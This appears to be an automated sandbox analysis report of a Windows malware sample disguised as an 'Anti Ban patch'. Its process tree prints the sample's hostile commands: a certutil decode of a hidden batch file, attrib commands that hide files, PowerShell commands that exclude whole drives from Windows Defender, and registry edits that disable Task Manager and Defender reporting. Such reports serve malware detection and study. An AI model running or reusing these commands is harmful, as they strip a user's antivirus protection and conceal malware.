Analysis

  • max time kernel
    121s
  • max time network
    125s
  • platform
    windows7_x64
  • resource
    win7-20240221-en
  • resource tags

    arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system
  • submitted
    28/02/2024, 02:36

General

  • Target

    aac90b5b7246530741aeb4fc99a6ddaa.exe

  • Size

    1.8MB

  • MD5

    aac90b5b7246530741aeb4fc99a6ddaa

  • SHA1

    68726895c8de2331f8b82e8019deaf7f5e0aa01c

  • SHA256

    99811b1ec2fb41ef3161af37e331658fac52a916d74f657444d6f9fdb7c1c186

  • SHA512

    a5e5593fb4bfc8092ef0feb1161318447538506e5f1315fda63cddca2538b21bc2189aed7d0f151054da78eeb4ae11350b03c2180faef02455bf5228f282dcb2

  • SSDEEP

    24576:vEvR5G0NicrR8Qi3BmQiVJQuwoecTtWtoV+Ec0xMkd8JsU3AoOqqIpWsR5F:vwR5G0NhR8Qi3GV+cgtoHqqIpWsR5F

Score
10/10

Malware Config

Signatures

  • Modifies Windows Defender notification settings 3 TTPs 2 IoCs
  • Disables Task Manager via registry modification
  • Sets file to hidden 1 TTPs 2 IoCs

    Modifies file attributes to stop it showing in Explorer etc.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Suspicious behavior: EnumeratesProcesses 6 IoCs
  • Suspicious use of AdjustPrivilegeToken 6 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Views/modifies file attributes 1 TTPs 6 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\aac90b5b7246530741aeb4fc99a6ddaa.exe
    "C:\Users\Admin\AppData\Local\Temp\aac90b5b7246530741aeb4fc99a6ddaa.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2952
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c if exist "%appdata%\Microsoft\Protect\KFICND.dll" (DEL /F/Q "%appdata%\Microsoft\Protect\KFICND.dll") >nul
      2⤵
        PID:760
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c if exist "%appdata%\Microsoft\Protect\KFICND.bat" (DEL /F/Q "%appdata%\Microsoft\Protect\KFICND.bat") >nul
        2⤵
          PID:2884
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c certutil -decode "%appdata%\Microsoft\Protect\KFICND.dll" "%appdata%\Microsoft\Protect\KFICND.bat" >nul
          2⤵
          • Suspicious use of WriteProcessMemory
          PID:3048
          • C:\Windows\system32\certutil.exe
            certutil -decode "C:\Users\Admin\AppData\Roaming\Microsoft\Protect\KFICND.dll" "C:\Users\Admin\AppData\Roaming\Microsoft\Protect\KFICND.bat"
            3⤵
              PID:2500
          • C:\Windows\system32\cmd.exe
            C:\Windows\system32\cmd.exe /c call "%appdata%\Microsoft\Protect\KFICND.bat"
            2⤵
              PID:2028
            • C:\Windows\system32\cmd.exe
              C:\Windows\system32\cmd.exe /c if exist "%appdata%\Microsoft\Protect\KFICND.dll" (DEL /F/Q "%appdata%\Microsoft\Protect\KFICND.dll") >nul
              2⤵
                PID:2516
              • C:\Windows\system32\cmd.exe
                C:\Windows\system32\cmd.exe /c if exist "%appdata%\Microsoft\Protect\KFICND.bat" (DEL /F/Q "%appdata%\Microsoft\Protect\KFICND.bat") >nul
                2⤵
                  PID:2536
                • C:\Windows\system32\cmd.exe
                  C:\Windows\system32\cmd.exe /c Attrib -S -H ""%appdata%\Microsoft\Protect\nul\\1.-Anti Ban patch RUN AS ADMIN.dll"" >nul
                  2⤵
                  • Suspicious use of WriteProcessMemory
                  PID:2644
                  • C:\Windows\system32\attrib.exe
                    Attrib -S -H ""C:\Users\Admin\AppData\Roaming\Microsoft\Protect\nul\\1.-Anti Ban patch RUN AS ADMIN.dll""
                    3⤵
                    • Views/modifies file attributes
                    PID:2652
                • C:\Windows\system32\cmd.exe
                  C:\Windows\system32\cmd.exe /c Attrib -S -H ""%appdata%\Microsoft\Protect\nul\\1.-Anti Ban patch RUN AS ADMIN.bat"" >nul
                  2⤵
                  • Suspicious use of WriteProcessMemory
                  PID:2664
                  • C:\Windows\system32\attrib.exe
                    Attrib -S -H ""C:\Users\Admin\AppData\Roaming\Microsoft\Protect\nul\\1.-Anti Ban patch RUN AS ADMIN.bat""
                    3⤵
                    • Views/modifies file attributes
                    PID:2672
                • C:\Windows\system32\cmd.exe
                  C:\Windows\system32\cmd.exe /c if exist "%appdata%\Microsoft\Protect\nul\\1.-Anti Ban patch RUN AS ADMIN.dll" (DEL /F/Q "%appdata%\Microsoft\Protect\nul\\1.-Anti Ban patch RUN AS ADMIN.dll") >nul
                  2⤵
                    PID:2760
                  • C:\Windows\system32\cmd.exe
                    C:\Windows\system32\cmd.exe /c if exist "%appdata%\Microsoft\Protect\nul\\1.-Anti Ban patch RUN AS ADMIN.bat" (DEL /F/Q "%appdata%\Microsoft\Protect\nul\\1.-Anti Ban patch RUN AS ADMIN.bat") >nul
                    2⤵
                      PID:2904
                    • C:\Windows\system32\cmd.exe
                      C:\Windows\system32\cmd.exe /c certutil -decode "%appdata%\Microsoft\Protect\nul\\1.-Anti Ban patch RUN AS ADMIN.dll" "%appdata%\Microsoft\Protect\nul\\1.-Anti Ban patch RUN AS ADMIN.bat" >nul
                      2⤵
                      • Suspicious use of WriteProcessMemory
                      PID:2560
                      • C:\Windows\system32\certutil.exe
                        certutil -decode "C:\Users\Admin\AppData\Roaming\Microsoft\Protect\nul\\1.-Anti Ban patch RUN AS ADMIN.dll" "C:\Users\Admin\AppData\Roaming\Microsoft\Protect\nul\\1.-Anti Ban patch RUN AS ADMIN.bat"
                        3⤵
                          PID:2552
                      • C:\Windows\system32\cmd.exe
                        C:\Windows\system32\cmd.exe /c Attrib +S +H ""%appdata%\Microsoft\Protect\nul\\1.-Anti Ban patch RUN AS ADMIN.bat"" >nul
                        2⤵
                        • Suspicious use of WriteProcessMemory
                        PID:2540
                        • C:\Windows\system32\attrib.exe
                          Attrib +S +H ""C:\Users\Admin\AppData\Roaming\Microsoft\Protect\nul\\1.-Anti Ban patch RUN AS ADMIN.bat""
                          3⤵
                          • Sets file to hidden
                          • Views/modifies file attributes
                          PID:2608
                      • C:\Windows\system32\cmd.exe
                        C:\Windows\system32\cmd.exe /c Attrib +S +H ""%appdata%\Microsoft\Protect\nul\\1.-Anti Ban patch RUN AS ADMIN.dll"" >nul
                        2⤵
                        • Suspicious use of WriteProcessMemory
                        PID:2416
                        • C:\Windows\system32\attrib.exe
                          Attrib +S +H ""C:\Users\Admin\AppData\Roaming\Microsoft\Protect\nul\\1.-Anti Ban patch RUN AS ADMIN.dll""
                          3⤵
                          • Sets file to hidden
                          • Views/modifies file attributes
                          PID:3060
                      • C:\Windows\system32\cmd.exe
                        C:\Windows\system32\cmd.exe /c call "%appdata%\Microsoft\Protect\nul\\1.-Anti Ban patch RUN AS ADMIN.bat"
                        2⤵
                        • Suspicious use of WriteProcessMemory
                        PID:2892
                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "D:"
                          3⤵
                          • Suspicious behavior: EnumeratesProcesses
                          • Suspicious use of AdjustPrivilegeToken
                          PID:2568
                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:"
                          3⤵
                          • Suspicious behavior: EnumeratesProcesses
                          • Suspicious use of AdjustPrivilegeToken
                          PID:2484
                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:/NEWDRIVERS"
                          3⤵
                          • Suspicious behavior: EnumeratesProcesses
                          • Suspicious use of AdjustPrivilegeToken
                          PID:2816
                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\Downloads"
                          3⤵
                          • Suspicious behavior: EnumeratesProcesses
                          • Suspicious use of AdjustPrivilegeToken
                          PID:2720
                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\Desktop"
                          3⤵
                          • Suspicious behavior: EnumeratesProcesses
                          • Suspicious use of AdjustPrivilegeToken
                          PID:1416
                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\NEWDRIVERS2"
                          3⤵
                          • Suspicious behavior: EnumeratesProcesses
                          • Suspicious use of AdjustPrivilegeToken
                          PID:1344
                        • C:\Windows\system32\reg.exe
                          REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /f /v DisableTaskMgr /t REG_DWORD /d 1
                          3⤵
                            PID:1508
                          • C:\Windows\system32\reg.exe
                            REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v SpynetReporting /t REG_DWORD /d 0
                            3⤵
                              PID:1248
                            • C:\Windows\system32\reg.exe
                              REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v SubmitSamplesConsent /t REG_DWORD /d 2
                              3⤵
                                PID:616
                              • C:\Windows\system32\reg.exe
                                REG ADD "HKCU\Software\Policies\Microsoft\Windows\Explorer" /f /v DisableNotificationCenter /t REG_DWORD /d 1
                                3⤵
                                  PID:1756
                                • C:\Windows\system32\reg.exe
                                  REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender Security Center\Notifications" /f /v DisableEnhancedNotifications /t REG_DWORD /d 1
                                  3⤵
                                  • Modifies Windows Defender notification settings
                                  PID:1472
                                • C:\Windows\system32\xcopy.exe
                                  XCOPY Bin\Mensaje.vbs C:\NEWDRIVERS /Y
                                  3⤵
                                    PID:2000
                                • C:\Windows\system32\cmd.exe
                                  C:\Windows\system32\cmd.exe /c Attrib -S -H ""%appdata%\Microsoft\Protect\nul\\1.-Anti Ban patch RUN AS ADMIN.dll"" >nul
                                  2⤵
                                    PID:2372
                                    • C:\Windows\system32\attrib.exe
                                      Attrib -S -H ""C:\Users\Admin\AppData\Roaming\Microsoft\Protect\nul\\1.-Anti Ban patch RUN AS ADMIN.dll""
                                      3⤵
                                      • Views/modifies file attributes
                                      PID:1188
                                  • C:\Windows\system32\cmd.exe
                                    C:\Windows\system32\cmd.exe /c Attrib -S -H ""%appdata%\Microsoft\Protect\nul\\1.-Anti Ban patch RUN AS ADMIN.bat"" >nul
                                    2⤵
                                      PID:1108
                                      • C:\Windows\system32\attrib.exe
                                        Attrib -S -H ""C:\Users\Admin\AppData\Roaming\Microsoft\Protect\nul\\1.-Anti Ban patch RUN AS ADMIN.bat""
                                        3⤵
                                        • Views/modifies file attributes
                                        PID:1640
                                    • C:\Windows\system32\cmd.exe
                                      C:\Windows\system32\cmd.exe /c if exist "%appdata%\Microsoft\Protect\nul\\1.-Anti Ban patch RUN AS ADMIN.dll" (DEL /F/Q "%appdata%\Microsoft\Protect\nul\\1.-Anti Ban patch RUN AS ADMIN.dll") >nul
                                      2⤵
                                        PID:2288
                                      • C:\Windows\system32\cmd.exe
                                        C:\Windows\system32\cmd.exe /c if exist "%appdata%\Microsoft\Protect\nul\\1.-Anti Ban patch RUN AS ADMIN.bat" (DEL /F/Q "%appdata%\Microsoft\Protect\nul\\1.-Anti Ban patch RUN AS ADMIN.bat") >nul
                                        2⤵
                                          PID:2364

                                      Network

                                      MITRE ATT&CK Enterprise v15

                                      Replay Monitor

                                      Loading Replay Monitor...

                                      Downloads

                                      • C:\Users\Admin\AppData\Roaming\Microsoft\Protect\KFICND.bat

                                        Filesize

                                        174B

                                        MD5

                                        6ef23a73bb6f911d522ea5fb934cb4b3

                                        SHA1

                                        e59665f75c29d41090bf604f5b2dd387400b4436

                                        SHA256

                                        62000a9ca00d44d4602306c795081f6ccf2c15724911874b51d16949c6759614

                                        SHA512

                                        8d4eabced6f579e53410f08aa50407fe6a980b6d66a7e2e0f3b8509aa780ef50654b67623dc0dba865ebc0f22b764f8043c89a62cb4c7c1f071f462c406764ab

                                      • C:\Users\Admin\AppData\Roaming\Microsoft\Protect\KFICND.dll

                                        Filesize

                                        296B

                                        MD5

                                        141d051bfa65caae138c60e613691bcc

                                        SHA1

                                        f6986986d303669b3b1d09317101b67fe33da8bc

                                        SHA256

                                        f98f27dd854a8806013c88248b51fe66efbf19112cde22dac3c21ac820e6bac9

                                        SHA512

                                        b76c8896faed2dd42fa617e41533acefbec483a17b80005982d5c92b15aeada46536572b223e508b298480aa90943f3e9a29b575596d5ce7a34e7780121e2afe

                                      • C:\Users\Admin\AppData\Roaming\Microsoft\Protect\nul\1.-Anti Ban patch RUN AS ADMIN.bat

                                        Filesize

                                        1KB

                                        MD5

                                        6343dee17a3e08d9fc78f520a6d177e1

                                        SHA1

                                        cbe3d0456ca954470d8f5da2badc07961ea6b0e6

                                        SHA256

                                        1343cbe790feb85cb43322c448844d60370348c68bc1c27fca59bb8b8af4ae02

                                        SHA512

                                        9b3abe607fe86824fbfb8ea508006225f4fba308dd9455fb319ced3cdaf5c6063d28946386705ce47000adc3f9e5a7b7631b4db1e7ca076a7890cf589c5e8421

                                      • C:\Users\Admin\AppData\Roaming\Microsoft\Protect\nul\1.-Anti Ban patch RUN AS ADMIN.dll

                                        Filesize

                                        2KB

                                        MD5

                                        f2063c3a364683464a8d80b3a5204bca

                                        SHA1

                                        2115e45254e65eeb71b9c8d3cb22bf75208830ec

                                        SHA256

                                        a455130af538666bbb7743482bea04dc82bf5e9c1706980acfeac60ed2d89ee0

                                        SHA512

                                        4c7c022250cbd67aa97a43e628ed642f1cc173bb3313d02221bdc11efa7c15adf669840bd81d4ec4c699a654dbb952756781dafa4d0039b125524c7c7578d87b

                                      • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

                                        Filesize

                                        7KB

                                        MD5

                                        145a21060290ab4c41f0bda18d9001b7

                                        SHA1

                                        f90ce2135e5113fdd35f5aab9cc35bd0fac005a1

                                        SHA256

                                        83016b1dda655e4c7834992ed0f62c6e8ccacec3a946d5e8507aa9515ed4c4b7

                                        SHA512

                                        afc807e5dbaf6c9b363d38de348a9568a8cd7ead9f28efaa99ece7862d2de943a744a3e101fa41ca54ecc83444aa6a9d47ee83a5dd2297643749b3e9da420842

                                      • memory/1344-78-0x000007FEF4B00000-0x000007FEF549D000-memory.dmp

                                        Filesize

                                        9.6MB

                                      • memory/1344-80-0x00000000024E0000-0x0000000002560000-memory.dmp

                                        Filesize

                                        512KB

                                      • memory/1344-81-0x00000000024E0000-0x0000000002560000-memory.dmp

                                        Filesize

                                        512KB

                                      • memory/1344-77-0x00000000024E0000-0x0000000002560000-memory.dmp

                                        Filesize

                                        512KB

                                      • memory/1344-76-0x000007FEF4B00000-0x000007FEF549D000-memory.dmp

                                        Filesize

                                        9.6MB

                                      • memory/1344-79-0x00000000024E4000-0x00000000024E7000-memory.dmp

                                        Filesize

                                        12KB

                                      • memory/1344-82-0x000007FEF4B00000-0x000007FEF549D000-memory.dmp

                                        Filesize

                                        9.6MB

                                      • memory/1416-70-0x000007FEF54A0000-0x000007FEF5E3D000-memory.dmp

                                        Filesize

                                        9.6MB

                                      • memory/1416-69-0x0000000002820000-0x00000000028A0000-memory.dmp

                                        Filesize

                                        512KB

                                      • memory/1416-68-0x0000000002820000-0x00000000028A0000-memory.dmp

                                        Filesize

                                        512KB

                                      • memory/1416-67-0x000007FEF54A0000-0x000007FEF5E3D000-memory.dmp

                                        Filesize

                                        9.6MB

                                      • memory/1416-66-0x0000000002820000-0x00000000028A0000-memory.dmp

                                        Filesize

                                        512KB

                                      • memory/1416-65-0x000007FEF54A0000-0x000007FEF5E3D000-memory.dmp

                                        Filesize

                                        9.6MB

                                      • memory/2484-26-0x000000001B390000-0x000000001B672000-memory.dmp

                                        Filesize

                                        2.9MB

                                      • memory/2484-30-0x000007FEF4B00000-0x000007FEF549D000-memory.dmp

                                        Filesize

                                        9.6MB

                                      • memory/2484-32-0x00000000027F0000-0x0000000002870000-memory.dmp

                                        Filesize

                                        512KB

                                      • memory/2484-34-0x000007FEF4B00000-0x000007FEF549D000-memory.dmp

                                        Filesize

                                        9.6MB

                                      • memory/2484-33-0x00000000027FB000-0x0000000002862000-memory.dmp

                                        Filesize

                                        412KB

                                      • memory/2484-27-0x000007FEF4B00000-0x000007FEF549D000-memory.dmp

                                        Filesize

                                        9.6MB

                                      • memory/2484-28-0x00000000027F0000-0x0000000002870000-memory.dmp

                                        Filesize

                                        512KB

                                      • memory/2484-29-0x0000000002590000-0x0000000002598000-memory.dmp

                                        Filesize

                                        32KB

                                      • memory/2484-31-0x00000000027F0000-0x0000000002870000-memory.dmp

                                        Filesize

                                        512KB

                                      • memory/2568-17-0x0000000002640000-0x00000000026C0000-memory.dmp

                                        Filesize

                                        512KB

                                      • memory/2568-16-0x000007FEF54A0000-0x000007FEF5E3D000-memory.dmp

                                        Filesize

                                        9.6MB

                                      • memory/2568-18-0x0000000002640000-0x00000000026C0000-memory.dmp

                                        Filesize

                                        512KB

                                      • memory/2568-19-0x0000000002640000-0x00000000026C0000-memory.dmp

                                        Filesize

                                        512KB

                                      • memory/2568-20-0x000007FEF54A0000-0x000007FEF5E3D000-memory.dmp

                                        Filesize

                                        9.6MB

                                      • memory/2568-15-0x0000000002640000-0x00000000026C0000-memory.dmp

                                        Filesize

                                        512KB

                                      • memory/2568-14-0x000007FEF54A0000-0x000007FEF5E3D000-memory.dmp

                                        Filesize

                                        9.6MB

                                      • memory/2568-13-0x0000000002310000-0x0000000002318000-memory.dmp

                                        Filesize

                                        32KB

                                      • memory/2568-12-0x000000001B320000-0x000000001B602000-memory.dmp

                                        Filesize

                                        2.9MB

                                      • memory/2720-58-0x0000000002A00000-0x0000000002A80000-memory.dmp

                                        Filesize

                                        512KB

                                      • memory/2720-56-0x0000000002A00000-0x0000000002A80000-memory.dmp

                                        Filesize

                                        512KB

                                      • memory/2720-59-0x0000000002A0B000-0x0000000002A72000-memory.dmp

                                        Filesize

                                        412KB

                                      • memory/2720-57-0x000007FEF4B00000-0x000007FEF549D000-memory.dmp

                                        Filesize

                                        9.6MB

                                      • memory/2720-55-0x000007FEF4B00000-0x000007FEF549D000-memory.dmp

                                        Filesize

                                        9.6MB

                                      • memory/2720-54-0x0000000002A00000-0x0000000002A80000-memory.dmp

                                        Filesize

                                        512KB

                                      • memory/2720-53-0x000007FEF4B00000-0x000007FEF549D000-memory.dmp

                                        Filesize

                                        9.6MB

                                      • memory/2720-95-0x0000000002A00000-0x0000000002A80000-memory.dmp

                                        Filesize

                                        512KB

                                      • memory/2816-44-0x0000000002980000-0x0000000002A00000-memory.dmp

                                        Filesize

                                        512KB

                                      • memory/2816-45-0x000007FEF54A0000-0x000007FEF5E3D000-memory.dmp

                                        Filesize

                                        9.6MB

                                      • memory/2816-43-0x0000000002980000-0x0000000002A00000-memory.dmp

                                        Filesize

                                        512KB

                                      • memory/2816-42-0x000007FEF54A0000-0x000007FEF5E3D000-memory.dmp

                                        Filesize

                                        9.6MB

                                      • memory/2816-41-0x0000000002980000-0x0000000002A00000-memory.dmp

                                        Filesize

                                        512KB

                                      • memory/2816-40-0x000007FEF54A0000-0x000007FEF5E3D000-memory.dmp

                                        Filesize

                                        9.6MB

                                      • memory/2892-92-0x0000000002020000-0x0000000002021000-memory.dmp

                                        Filesize

                                        4KB

                                      • memory/2952-94-0x0000000000400000-0x0000000000502000-memory.dmp

                                        Filesize

                                        1.0MB

                                      • memory/2952-52-0x0000000000400000-0x0000000000502000-memory.dmp

                                        Filesize

                                        1.0MB